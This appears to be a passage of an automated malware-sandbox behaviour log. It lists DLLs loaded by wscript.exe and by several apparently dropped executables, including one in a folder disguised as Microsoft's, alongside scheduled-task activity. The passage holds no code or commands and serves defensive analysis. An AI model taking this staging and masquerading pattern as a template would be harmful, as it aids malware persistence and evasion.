Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: ntvdm64.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: dui70.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: duser.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: chartv.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: version.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: wldp.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: profapi.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: amsi.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: userenv.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: rasapi32.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: rasman.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: rtutils.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: mswsock.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: winhttp.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: iphlpapi.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: dhcpcsvc6.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: dhcpcsvc.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: dnsapi.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: winnsi.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: rasadhlp.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: fwpuclnt.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: secur32.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: sspicli.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: schannel.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: mskeyprotect.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: ntasn1.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: ncrypt.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: ncryptsslp.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: msasn1.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: ntvdm64.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: ntvdm64.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: ntvdm64.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	Section loaded: uxtheme.dll
